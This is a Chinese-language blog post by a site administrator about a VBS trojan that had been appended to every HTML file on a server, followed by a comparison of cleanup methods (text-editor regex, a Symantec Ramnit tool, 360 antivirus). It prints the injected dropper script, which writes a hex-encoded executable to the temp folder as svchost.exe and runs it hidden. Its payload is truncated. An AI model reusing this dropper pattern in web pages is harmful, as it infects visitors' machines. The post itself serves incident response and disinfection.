HTML网页文件暗藏VBS木马 全盘中招-文件夹病毒专杀工具

今天下午在转移服务器的时候,发现模板文件夹里的HTML文件全部均在大小112K至120K大小不等,深深的引起了我的注意,感觉很奇怪,正常制作的HTML模板文件大小都在5K左右的,怎么一下子这么大?不看不知,一看才发现新大陆!

木马呈现方式

代码效果:在网站里面所有的HTML文件后面,会自动添加一段VB代码,只要是HTML,一个不漏!

代码方式:

  1. <SCRIPT Language=VBScript><!--
  2. DropFileName = "svchost.exe"
  3. WriteData = "4D5A90000300000004
  4. …… …… ……
  5. F636573730000004472616746696E697368000057696E48656C705700000000000000000000"
  6. Set FSO = CreateObject("Scripting.FileSystemObject")
  7. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
  8. If FSO.FileExists(DropPath)=False Then
  9. Set FileObj = FSO.CreateTextFile(DropPath, True)
  10. For i = 1 To Len(WriteData) Step 2
  11. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
  12. Next
  13. FileObj.Close
  14. End If
  15. Set WSHshell = CreateObject("WScript.Shell")
  16. WSHshell.Run DropPath, 0
  17. //--></SCRIPT>

效果截图:

HTML网页文件暗藏VBS木马 全盘中招

VBS木马特征:

【内容来源于:https://www.diebaosoft.com/】,未经授权,谢绝转载

清理木马处理的时候提供了三个思路:

思路一、采用NOTEPAD++或UE编辑器,通过设置正式表达式利用文本批量替换此木马

结局:因木马内容太长,而要清理的文件太多,常规的编辑器根本顶不住内存的压力,最终失败告终!

思路二、采用赛门铁克推出的专用查杀工具:赛门铁克Ramnit病毒专杀工具(Symantec Ramnit Removal Tool) 2.4.4.3;

结局:无法设置指定目录的查杀,处理过程周期太长,看不到终点;同时无查杀进展报告,最终放弃;

注:

因为全部是网站文件,我们在寻找解决问题的时候,不能删除目标HTML文件,对于一个互联网网站服务者而言,将面临的不亚于灭顶之灾,所以只能对目标木马进行清理后,并保留修复后的正常原HTML文件

思路三、采用360杀毒;

结局:虽然一直对360不报有好的态度,但在当前此问题上,也着实解决了问题;在使用中,能快速检测C盘异常感染的病休文件,并优先进行查杀;然后通过指定目录的查杀,批量查杀VBS木马;

HTML网页文件暗藏VBS木马 全盘中招

经过测试,360软件检测出来的HTML感染文件,当扫描结束后,点击立即处理,此时软件并不是直接删除文件,而是清理了其中的VBS木马,并完美保存了原HTML文件,而这才是重点;也正好解决了我们担心的问题;

在这个互联网信息泛滥的环境下,当我们在大量信息里面筛选自己想要的软件及各类信息的时候,还是要尽量选择从目标软件官方去下载对应的软件,尽量不要去下载破解软件,以防电脑及电脑上面的资料遭受无法逆转的损失!!!

推荐阅读